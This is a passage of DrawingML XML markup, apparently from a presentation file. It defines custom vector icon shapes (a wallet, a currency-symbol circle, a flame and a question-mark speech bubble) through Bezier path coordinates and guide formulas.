                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="132"/>
                    <a:pt x="147" y="136"/>
                    <a:pt x="152" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="136"/>
                    <a:pt x="162" y="132"/>
                    <a:pt x="162" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="121"/>
                    <a:pt x="158" y="117"/>
                    <a:pt x="152" y="117"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="152"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="152"/>
                    <a:pt x="180" y="152"/>
                    <a:pt x="192" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="160"/>
                    <a:pt x="192" y="166"/>
                    <a:pt x="192" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="185"/>
                    <a:pt x="178" y="200"/>
                    <a:pt x="160" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="200"/>
                    <a:pt x="33" y="200"/>
                    <a:pt x="33" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="200"/>
                    <a:pt x="0" y="185"/>
                    <a:pt x="0" y="16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68"/>
                    <a:pt x="15" y="52"/>
                    <a:pt x="33" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="52"/>
                    <a:pt x="160" y="52"/>
                    <a:pt x="160" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="52"/>
                    <a:pt x="192" y="68"/>
                    <a:pt x="192" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="87"/>
                    <a:pt x="192" y="92"/>
                    <a:pt x="192" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="100"/>
                    <a:pt x="150" y="100"/>
                    <a:pt x="133" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="100"/>
                    <a:pt x="120" y="152"/>
                    <a:pt x="134" y="152"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="117" y="21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34" y="44"/>
                    <a:pt x="134" y="44"/>
                    <a:pt x="134" y="44"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="117" y="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0D2651CC-0555-4015-9049-1012902816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786341">
              <a:off x="11120115" y="1879845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251B2BB2-0815-4C50-A4D9-1BA3CBEA7F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41311" y="2325220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6B38B72-5CDB-42CC-B0BD-9BFA7D8D4F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91482">
              <a:off x="1247068" y="4064312"/>
              <a:ext cx="892239" cy="899464"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172 w 209"/>
                <a:gd name="T1" fmla="*/ 37 h 210"/>
                <a:gd name="T2" fmla="*/ 37 w 209"/>
                <a:gd name="T3" fmla="*/ 37 h 210"/>
                <a:gd name="T4" fmla="*/ 37 w 209"/>
                <a:gd name="T5" fmla="*/ 172 h 210"/>
                <a:gd name="T6" fmla="*/ 172 w 209"/>
                <a:gd name="T7" fmla="*/ 172 h 210"/>
                <a:gd name="T8" fmla="*/ 172 w 209"/>
                <a:gd name="T9" fmla="*/ 37 h 210"/>
                <a:gd name="T10" fmla="*/ 135 w 209"/>
                <a:gd name="T11" fmla="*/ 158 h 210"/>
                <a:gd name="T12" fmla="*/ 124 w 209"/>
                <a:gd name="T13" fmla="*/ 160 h 210"/>
                <a:gd name="T14" fmla="*/ 105 w 209"/>
                <a:gd name="T15" fmla="*/ 157 h 210"/>
                <a:gd name="T16" fmla="*/ 88 w 209"/>
                <a:gd name="T17" fmla="*/ 153 h 210"/>
                <a:gd name="T18" fmla="*/ 69 w 209"/>
                <a:gd name="T19" fmla="*/ 160 h 210"/>
                <a:gd name="T20" fmla="*/ 61 w 209"/>
                <a:gd name="T21" fmla="*/ 142 h 210"/>
                <a:gd name="T22" fmla="*/ 73 w 209"/>
                <a:gd name="T23" fmla="*/ 128 h 210"/>
                <a:gd name="T24" fmla="*/ 77 w 209"/>
                <a:gd name="T25" fmla="*/ 115 h 210"/>
                <a:gd name="T26" fmla="*/ 77 w 209"/>
                <a:gd name="T27" fmla="*/ 112 h 210"/>
                <a:gd name="T28" fmla="*/ 61 w 209"/>
                <a:gd name="T29" fmla="*/ 112 h 210"/>
                <a:gd name="T30" fmla="*/ 61 w 209"/>
                <a:gd name="T31" fmla="*/ 93 h 210"/>
                <a:gd name="T32" fmla="*/ 73 w 209"/>
                <a:gd name="T33" fmla="*/ 93 h 210"/>
                <a:gd name="T34" fmla="*/ 70 w 209"/>
                <a:gd name="T35" fmla="*/ 75 h 210"/>
                <a:gd name="T36" fmla="*/ 74 w 209"/>
                <a:gd name="T37" fmla="*/ 59 h 210"/>
                <a:gd name="T38" fmla="*/ 87 w 209"/>
                <a:gd name="T39" fmla="*/ 48 h 210"/>
                <a:gd name="T40" fmla="*/ 106 w 209"/>
                <a:gd name="T41" fmla="*/ 44 h 210"/>
                <a:gd name="T42" fmla="*/ 130 w 209"/>
                <a:gd name="T43" fmla="*/ 52 h 210"/>
                <a:gd name="T44" fmla="*/ 141 w 209"/>
                <a:gd name="T45" fmla="*/ 73 h 210"/>
                <a:gd name="T46" fmla="*/ 120 w 209"/>
                <a:gd name="T47" fmla="*/ 76 h 210"/>
                <a:gd name="T48" fmla="*/ 114 w 209"/>
                <a:gd name="T49" fmla="*/ 65 h 210"/>
                <a:gd name="T50" fmla="*/ 105 w 209"/>
                <a:gd name="T51" fmla="*/ 61 h 210"/>
                <a:gd name="T52" fmla="*/ 95 w 209"/>
                <a:gd name="T53" fmla="*/ 65 h 210"/>
                <a:gd name="T54" fmla="*/ 91 w 209"/>
                <a:gd name="T55" fmla="*/ 75 h 210"/>
                <a:gd name="T56" fmla="*/ 92 w 209"/>
                <a:gd name="T57" fmla="*/ 84 h 210"/>
                <a:gd name="T58" fmla="*/ 94 w 209"/>
                <a:gd name="T59" fmla="*/ 93 h 210"/>
                <a:gd name="T60" fmla="*/ 120 w 209"/>
                <a:gd name="T61" fmla="*/ 93 h 210"/>
                <a:gd name="T62" fmla="*/ 120 w 209"/>
                <a:gd name="T63" fmla="*/ 112 h 210"/>
                <a:gd name="T64" fmla="*/ 98 w 209"/>
                <a:gd name="T65" fmla="*/ 112 h 210"/>
                <a:gd name="T66" fmla="*/ 98 w 209"/>
                <a:gd name="T67" fmla="*/ 114 h 210"/>
                <a:gd name="T68" fmla="*/ 96 w 209"/>
                <a:gd name="T69" fmla="*/ 125 h 210"/>
                <a:gd name="T70" fmla="*/ 87 w 209"/>
                <a:gd name="T71" fmla="*/ 139 h 210"/>
                <a:gd name="T72" fmla="*/ 97 w 209"/>
                <a:gd name="T73" fmla="*/ 136 h 210"/>
                <a:gd name="T74" fmla="*/ 102 w 209"/>
                <a:gd name="T75" fmla="*/ 137 h 210"/>
                <a:gd name="T76" fmla="*/ 108 w 209"/>
                <a:gd name="T77" fmla="*/ 138 h 210"/>
                <a:gd name="T78" fmla="*/ 121 w 209"/>
                <a:gd name="T79" fmla="*/ 141 h 210"/>
                <a:gd name="T80" fmla="*/ 136 w 209"/>
                <a:gd name="T81" fmla="*/ 136 h 210"/>
                <a:gd name="T82" fmla="*/ 145 w 209"/>
                <a:gd name="T83" fmla="*/ 155 h 210"/>
                <a:gd name="T84" fmla="*/ 135 w 209"/>
                <a:gd name="T85" fmla="*/ 15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9" h="210">
                  <a:moveTo>
                    <a:pt x="172" y="37"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="0"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="37" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="75"/>
                    <a:pt x="0" y="135"/>
                    <a:pt x="37" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="210"/>
                    <a:pt x="135" y="210"/>
                    <a:pt x="172" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="135"/>
                    <a:pt x="209" y="75"/>
                    <a:pt x="172" y="37"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="135" y="158"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="159"/>
                    <a:pt x="127" y="160"/>
                    <a:pt x="124" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="160"/>
                    <a:pt x="113" y="159"/>
                    <a:pt x="105" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="154"/>
                    <a:pt x="92" y="153"/>
                    <a:pt x="88" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="153"/>
                    <a:pt x="76" y="156"/>
                    <a:pt x="69" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="142"/>
                    <a:pt x="61" y="142"/>
                    <a:pt x="61" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="137"/>
                    <a:pt x="71" y="133"/>
                    <a:pt x="73" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="124"/>
                    <a:pt x="77" y="119"/>
                    <a:pt x="77" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="114"/>
                    <a:pt x="77" y="114"/>
                    <a:pt x="77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1" y="87"/>
                    <a:pt x="70" y="81"/>
                    <a:pt x="70" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="70"/>
                    <a:pt x="71" y="64"/>
                    <a:pt x="74" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="54"/>
                    <a:pt x="82" y="50"/>
                    <a:pt x="87" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="45"/>
                    <a:pt x="99" y="44"/>
                    <a:pt x="106" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="44"/>
                    <a:pt x="124" y="46"/>
                    <a:pt x="130" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="57"/>
                    <a:pt x="139" y="64"/>
                    <a:pt x="141" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="76"/>
                    <a:pt x="120" y="76"/>
                    <a:pt x="120" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="71"/>
                    <a:pt x="117" y="67"/>
                    <a:pt x="114" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="62"/>
                    <a:pt x="109" y="61"/>
                    <a:pt x="105" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="61"/>
                    <a:pt x="97" y="62"/>
                    <a:pt x="95" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="68"/>
                    <a:pt x="91" y="71"/>
                    <a:pt x="91" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="78"/>
                    <a:pt x="91" y="80"/>
                    <a:pt x="92" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="87"/>
                    <a:pt x="93" y="90"/>
                    <a:pt x="94" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="93"/>
                    <a:pt x="120" y="93"/>
                    <a:pt x="120" y="93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8" y="114"/>
                    <a:pt x="98" y="113"/>
                    <a:pt x="98" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="118"/>
                    <a:pt x="97" y="122"/>
                    <a:pt x="96" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="129"/>
                    <a:pt x="91" y="133"/>
                    <a:pt x="87" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="137"/>
                    <a:pt x="93" y="136"/>
                    <a:pt x="97" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="136"/>
                    <a:pt x="100" y="137"/>
                    <a:pt x="102" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="137"/>
                    <a:pt x="105" y="137"/>
                    <a:pt x="108" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="140"/>
                    <a:pt x="119" y="141"/>
                    <a:pt x="121" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="141"/>
                    <a:pt x="130" y="139"/>
                    <a:pt x="136" y="136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2" y="156"/>
                    <a:pt x="138" y="157"/>
                    <a:pt x="135" y="1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E30DAD4-1BC3-4E8F-93D4-CCE88140D9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59057" y="157214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C45C333B-1849-4101-82A0-56C964D73E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7877841">
              <a:off x="721579" y="4124487"/>
              <a:ext cx="563825" cy="417088"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 163 w 268"/>
                <a:gd name="T1" fmla="*/ 36 h 198"/>
                <a:gd name="T2" fmla="*/ 151 w 268"/>
                <a:gd name="T3" fmla="*/ 87 h 198"/>
                <a:gd name="T4" fmla="*/ 146 w 268"/>
                <a:gd name="T5" fmla="*/ 0 h 198"/>
                <a:gd name="T6" fmla="*/ 97 w 268"/>
                <a:gd name="T7" fmla="*/ 32 h 198"/>
                <a:gd name="T8" fmla="*/ 82 w 268"/>
                <a:gd name="T9" fmla="*/ 105 h 198"/>
                <a:gd name="T10" fmla="*/ 73 w 268"/>
                <a:gd name="T11" fmla="*/ 63 h 198"/>
                <a:gd name="T12" fmla="*/ 138 w 268"/>
                <a:gd name="T13" fmla="*/ 198 h 198"/>
                <a:gd name="T14" fmla="*/ 163 w 268"/>
                <a:gd name="T15" fmla="*/ 36 h 198"/>
                <a:gd name="T16" fmla="*/ 116 w 268"/>
                <a:gd name="T17" fmla="*/ 168 h 198"/>
                <a:gd name="T18" fmla="*/ 103 w 268"/>
                <a:gd name="T19" fmla="*/ 168 h 198"/>
                <a:gd name="T20" fmla="*/ 103 w 268"/>
                <a:gd name="T21" fmla="*/ 144 h 198"/>
                <a:gd name="T22" fmla="*/ 87 w 268"/>
                <a:gd name="T23" fmla="*/ 144 h 198"/>
                <a:gd name="T24" fmla="*/ 87 w 268"/>
                <a:gd name="T25" fmla="*/ 168 h 198"/>
                <a:gd name="T26" fmla="*/ 75 w 268"/>
                <a:gd name="T27" fmla="*/ 168 h 198"/>
                <a:gd name="T28" fmla="*/ 75 w 268"/>
                <a:gd name="T29" fmla="*/ 115 h 198"/>
                <a:gd name="T30" fmla="*/ 87 w 268"/>
                <a:gd name="T31" fmla="*/ 115 h 198"/>
                <a:gd name="T32" fmla="*/ 87 w 268"/>
                <a:gd name="T33" fmla="*/ 136 h 198"/>
                <a:gd name="T34" fmla="*/ 103 w 268"/>
                <a:gd name="T35" fmla="*/ 136 h 198"/>
                <a:gd name="T36" fmla="*/ 103 w 268"/>
                <a:gd name="T37" fmla="*/ 115 h 198"/>
                <a:gd name="T38" fmla="*/ 116 w 268"/>
                <a:gd name="T39" fmla="*/ 115 h 198"/>
                <a:gd name="T40" fmla="*/ 116 w 268"/>
                <a:gd name="T41" fmla="*/ 168 h 198"/>
                <a:gd name="T42" fmla="*/ 158 w 268"/>
                <a:gd name="T43" fmla="*/ 160 h 198"/>
                <a:gd name="T44" fmla="*/ 141 w 268"/>
                <a:gd name="T45" fmla="*/ 166 h 198"/>
                <a:gd name="T46" fmla="*/ 124 w 268"/>
                <a:gd name="T47" fmla="*/ 159 h 198"/>
                <a:gd name="T48" fmla="*/ 118 w 268"/>
                <a:gd name="T49" fmla="*/ 141 h 198"/>
                <a:gd name="T50" fmla="*/ 124 w 268"/>
                <a:gd name="T51" fmla="*/ 123 h 198"/>
                <a:gd name="T52" fmla="*/ 141 w 268"/>
                <a:gd name="T53" fmla="*/ 117 h 198"/>
                <a:gd name="T54" fmla="*/ 158 w 268"/>
                <a:gd name="T55" fmla="*/ 123 h 198"/>
                <a:gd name="T56" fmla="*/ 164 w 268"/>
                <a:gd name="T57" fmla="*/ 141 h 198"/>
                <a:gd name="T58" fmla="*/ 158 w 268"/>
                <a:gd name="T59" fmla="*/ 160 h 198"/>
                <a:gd name="T60" fmla="*/ 187 w 268"/>
                <a:gd name="T61" fmla="*/ 128 h 198"/>
                <a:gd name="T62" fmla="*/ 187 w 268"/>
                <a:gd name="T63" fmla="*/ 168 h 198"/>
                <a:gd name="T64" fmla="*/ 175 w 268"/>
                <a:gd name="T65" fmla="*/ 168 h 198"/>
                <a:gd name="T66" fmla="*/ 175 w 268"/>
                <a:gd name="T67" fmla="*/ 128 h 198"/>
                <a:gd name="T68" fmla="*/ 161 w 268"/>
                <a:gd name="T69" fmla="*/ 128 h 198"/>
                <a:gd name="T70" fmla="*/ 161 w 268"/>
                <a:gd name="T71" fmla="*/ 115 h 198"/>
                <a:gd name="T72" fmla="*/ 201 w 268"/>
                <a:gd name="T73" fmla="*/ 115 h 198"/>
                <a:gd name="T74" fmla="*/ 201 w 268"/>
                <a:gd name="T75" fmla="*/ 128 h 198"/>
                <a:gd name="T76" fmla="*/ 187 w 268"/>
                <a:gd name="T77" fmla="*/ 128 h 198"/>
                <a:gd name="T78" fmla="*/ 148 w 268"/>
                <a:gd name="T79" fmla="*/ 129 h 198"/>
                <a:gd name="T80" fmla="*/ 145 w 268"/>
                <a:gd name="T81" fmla="*/ 127 h 198"/>
                <a:gd name="T82" fmla="*/ 141 w 268"/>
                <a:gd name="T83" fmla="*/ 126 h 198"/>
                <a:gd name="T84" fmla="*/ 137 w 268"/>
                <a:gd name="T85" fmla="*/ 126 h 198"/>
                <a:gd name="T86" fmla="*/ 133 w 268"/>
                <a:gd name="T87" fmla="*/ 129 h 198"/>
                <a:gd name="T88" fmla="*/ 131 w 268"/>
                <a:gd name="T89" fmla="*/ 134 h 198"/>
                <a:gd name="T90" fmla="*/ 130 w 268"/>
                <a:gd name="T91" fmla="*/ 141 h 198"/>
                <a:gd name="T92" fmla="*/ 131 w 268"/>
                <a:gd name="T93" fmla="*/ 149 h 198"/>
                <a:gd name="T94" fmla="*/ 133 w 268"/>
                <a:gd name="T95" fmla="*/ 153 h 198"/>
                <a:gd name="T96" fmla="*/ 137 w 268"/>
                <a:gd name="T97" fmla="*/ 156 h 198"/>
                <a:gd name="T98" fmla="*/ 141 w 268"/>
                <a:gd name="T99" fmla="*/ 157 h 198"/>
                <a:gd name="T100" fmla="*/ 145 w 268"/>
                <a:gd name="T101" fmla="*/ 156 h 198"/>
                <a:gd name="T102" fmla="*/ 148 w 268"/>
                <a:gd name="T103" fmla="*/ 153 h 198"/>
                <a:gd name="T104" fmla="*/ 151 w 268"/>
                <a:gd name="T105" fmla="*/ 149 h 198"/>
                <a:gd name="T106" fmla="*/ 151 w 268"/>
                <a:gd name="T107" fmla="*/ 141 h 198"/>
                <a:gd name="T108" fmla="*/ 151 w 268"/>
                <a:gd name="T109" fmla="*/ 134 h 198"/>
                <a:gd name="T110" fmla="*/ 148 w 268"/>
                <a:gd name="T111" fmla="*/ 12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8" h="198">
                  <a:moveTo>
                    <a:pt x="163" y="36"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="83"/>
                    <a:pt x="155" y="87"/>
                    <a:pt x="151" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="88"/>
                    <a:pt x="138" y="4"/>
                    <a:pt x="146" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="0"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="97" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="66"/>
                    <a:pt x="106" y="98"/>
                    <a:pt x="82" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="113"/>
                    <a:pt x="71" y="71"/>
                    <a:pt x="73" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="62"/>
                    <a:pt x="0" y="198"/>
                    <a:pt x="138" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268" y="198"/>
                    <a:pt x="204" y="38"/>
                    <a:pt x="163" y="36"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="168"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="168"/>
                    <a:pt x="103" y="168"/>
                    <a:pt x="103" y="168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87" y="144"/>
                    <a:pt x="87" y="144"/>
                    <a:pt x="87" y="144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75" y="168"/>
                    <a:pt x="75" y="168"/>
                    <a:pt x="75" y="168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87" y="115"/>
                    <a:pt x="87" y="115"/>
                    <a:pt x="87" y="11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16" y="115"/>
                    <a:pt x="116" y="115"/>
                    <a:pt x="116" y="115"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="168"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="158" y="160"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="164"/>
                    <a:pt x="148" y="166"/>
                    <a:pt x="141" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="166"/>
                    <a:pt x="128" y="164"/>
                    <a:pt x="124" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="155"/>
                    <a:pt x="118" y="149"/>
                    <a:pt x="118" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="134"/>
                    <a:pt x="120" y="128"/>
                    <a:pt x="124" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="119"/>
                    <a:pt x="134" y="117"/>
                    <a:pt x="141" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="117"/>
                    <a:pt x="154" y="119"/>
                    <a:pt x="158" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="128"/>
                    <a:pt x="164" y="134"/>
                    <a:pt x="164" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="149"/>
                    <a:pt x="162" y="155"/>
                    <a:pt x="158" y="160"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="187" y="128"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="168"/>
                    <a:pt x="187" y="168"/>
                    <a:pt x="187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61" y="128"/>
                    <a:pt x="161" y="128"/>
                    <a:pt x="161" y="128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28"/>
                    <a:pt x="201" y="128"/>
                    <a:pt x="201" y="128"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="187" y="128"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="148" y="129"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="128"/>
                    <a:pt x="146" y="127"/>
                    <a:pt x="145" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="126"/>
                    <a:pt x="142" y="126"/>
                    <a:pt x="141" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="126"/>
                    <a:pt x="138" y="126"/>
                    <a:pt x="137" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="127"/>
                    <a:pt x="135" y="128"/>
                    <a:pt x="133" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="130"/>
                    <a:pt x="132" y="132"/>
                    <a:pt x="131" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="136"/>
                    <a:pt x="130" y="139"/>
                    <a:pt x="130" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="144"/>
                    <a:pt x="130" y="147"/>
                    <a:pt x="131" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="151"/>
                    <a:pt x="132" y="152"/>
                    <a:pt x="133" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="155"/>
                    <a:pt x="136" y="156"/>
                    <a:pt x="137" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="157"/>
                    <a:pt x="139" y="157"/>
                    <a:pt x="141" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="157"/>
                    <a:pt x="144" y="157"/>
                    <a:pt x="145" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="156"/>
                    <a:pt x="147" y="155"/>
                    <a:pt x="148" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="152"/>
                    <a:pt x="150" y="150"/>
                    <a:pt x="151" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="147"/>
                    <a:pt x="151" y="144"/>
                    <a:pt x="151" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="139"/>
                    <a:pt x="151" y="136"/>
                    <a:pt x="151" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="132"/>
                    <a:pt x="149" y="131"/>
                    <a:pt x="148" y="1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893732E9-224C-4279-808D-C01445F511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9761" y="615610"/>
              <a:ext cx="1016159" cy="1016158"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 104 w 198"/>
                <a:gd name="T1" fmla="*/ 187 h 198"/>
                <a:gd name="T2" fmla="*/ 68 w 198"/>
                <a:gd name="T3" fmla="*/ 179 h 198"/>
                <a:gd name="T4" fmla="*/ 0 w 198"/>
                <a:gd name="T5" fmla="*/ 198 h 198"/>
                <a:gd name="T6" fmla="*/ 31 w 198"/>
                <a:gd name="T7" fmla="*/ 152 h 198"/>
                <a:gd name="T8" fmla="*/ 11 w 198"/>
                <a:gd name="T9" fmla="*/ 93 h 198"/>
                <a:gd name="T10" fmla="*/ 104 w 198"/>
                <a:gd name="T11" fmla="*/ 0 h 198"/>
                <a:gd name="T12" fmla="*/ 198 w 198"/>
                <a:gd name="T13" fmla="*/ 93 h 198"/>
                <a:gd name="T14" fmla="*/ 104 w 198"/>
                <a:gd name="T15" fmla="*/ 187 h 198"/>
                <a:gd name="T16" fmla="*/ 76 w 198"/>
                <a:gd name="T17" fmla="*/ 137 h 198"/>
                <a:gd name="T18" fmla="*/ 89 w 198"/>
                <a:gd name="T19" fmla="*/ 151 h 198"/>
                <a:gd name="T20" fmla="*/ 106 w 198"/>
                <a:gd name="T21" fmla="*/ 134 h 198"/>
                <a:gd name="T22" fmla="*/ 92 w 198"/>
                <a:gd name="T23" fmla="*/ 120 h 198"/>
                <a:gd name="T24" fmla="*/ 76 w 198"/>
                <a:gd name="T25" fmla="*/ 137 h 198"/>
                <a:gd name="T26" fmla="*/ 109 w 198"/>
                <a:gd name="T27" fmla="*/ 33 h 198"/>
                <a:gd name="T28" fmla="*/ 81 w 198"/>
                <a:gd name="T29" fmla="*/ 40 h 198"/>
                <a:gd name="T30" fmla="*/ 84 w 198"/>
                <a:gd name="T31" fmla="*/ 57 h 198"/>
                <a:gd name="T32" fmla="*/ 102 w 198"/>
                <a:gd name="T33" fmla="*/ 53 h 198"/>
                <a:gd name="T34" fmla="*/ 112 w 198"/>
                <a:gd name="T35" fmla="*/ 61 h 198"/>
                <a:gd name="T36" fmla="*/ 99 w 198"/>
                <a:gd name="T37" fmla="*/ 79 h 198"/>
                <a:gd name="T38" fmla="*/ 83 w 198"/>
                <a:gd name="T39" fmla="*/ 107 h 198"/>
                <a:gd name="T40" fmla="*/ 83 w 198"/>
                <a:gd name="T41" fmla="*/ 112 h 198"/>
                <a:gd name="T42" fmla="*/ 106 w 198"/>
                <a:gd name="T43" fmla="*/ 112 h 198"/>
                <a:gd name="T44" fmla="*/ 107 w 198"/>
                <a:gd name="T45" fmla="*/ 108 h 198"/>
                <a:gd name="T46" fmla="*/ 119 w 198"/>
                <a:gd name="T47" fmla="*/ 88 h 198"/>
                <a:gd name="T48" fmla="*/ 137 w 198"/>
                <a:gd name="T49" fmla="*/ 56 h 198"/>
                <a:gd name="T50" fmla="*/ 109 w 198"/>
                <a:gd name="T51" fmla="*/ 3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8" h="198">
                  <a:moveTo>
                    <a:pt x="104" y="187"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="187"/>
                    <a:pt x="79" y="184"/>
                    <a:pt x="68" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="198"/>
                    <a:pt x="0" y="198"/>
                    <a:pt x="0" y="198"/>
                  </a:cubicBezTo>
